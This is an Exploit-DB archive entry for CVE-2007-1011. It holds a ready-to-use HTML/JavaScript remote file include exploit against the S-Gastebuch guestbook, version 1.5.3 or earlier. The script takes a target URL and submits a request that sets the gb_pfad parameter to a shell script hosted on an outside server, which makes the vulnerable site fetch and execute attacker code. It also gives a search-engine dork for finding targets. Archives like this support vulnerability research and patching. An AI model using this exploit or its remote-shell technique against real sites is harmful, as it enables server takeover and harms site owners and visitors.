S-Gastebuch <= 1.5.3 gb_pfad Remote File Include Exploit

2007-02-18T00:00:00
ID EDB-ID:3328
Type exploitdb
Reporter ajann
Modified 2007-02-18T00:00:00

Description

S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit. CVE-2007-1011. Webapps exploit for php platform

                                        
                                            &lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1254"&gt;
&lt;title&gt;S-Gästebuch &lt;= V.1.5.3 (gb_pfad) Remote File Include Exploit&lt;/title&gt;

&lt;script language="JavaScript"&gt;
 
//'===============================================================================================
//'[Script Name: S-Gästebuch &lt;= V.1.5.3 (gb_pfad) Remote File Include Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[Dork       : VS-Gästebuch V. ©
//'[Dork Ex.   : http://www.google.com.tr/search?q=VS-G%C3%A4stebuch+V.+%C2%A9&hl=tr&start=10&sa=N
//'[S.Page     : http://www.virtualsystem.de/
//'[$$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================

//'[[ERROR]]]------------------------------------------------------
//'....
//'..
//'&lt;?
//'
//'include ($gb_pfad ."/language/german.php");
//'
//'?&gt;
//'....
//'..
//'[[ERROR]]]---------------------------------------------------------

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path="/inc/"
   var adres="/functions_inc.php?" //File name
   var acik ="gb_pfad=" // Line x
   var shell="http://www.ehcbinningen.ch/komutverivee.txt?" // Shell Script
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready Target : )
  rfi.submit(); // Form Submit
   }
&lt;/script&gt;

&lt;/head&gt;

&lt;body bgcolor="#000000"&gt;
&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;S-Gästebuch &lt;= V.1.5.3 (gb_pfad) Remote File Include Exploit&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;
&lt;form method="post" target="getting" name="rfi" onSubmit="command();"&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FF0000"&gt;Target:&lt;/font&gt;&lt;font face="Arial" size="1" color="#808080"&gt;[http://[target]/[scriptpath]&lt;/font&gt;&lt;font color="#00FF00" size="2" face="Arial"&gt;
  &lt;/font&gt;&lt;font color="#FF0000" size="2"&gt;&nbsp;&lt;/font&gt;&lt;/b&gt;
  &lt;input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Gonder" name="B1"&gt;&lt;input type="reset" value="Sifirla" name="B2"&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;p&gt;&lt;br&gt;
&lt;iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"&gt;&lt;/iframe&gt;
&lt;/p&gt;

&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2007-02-18]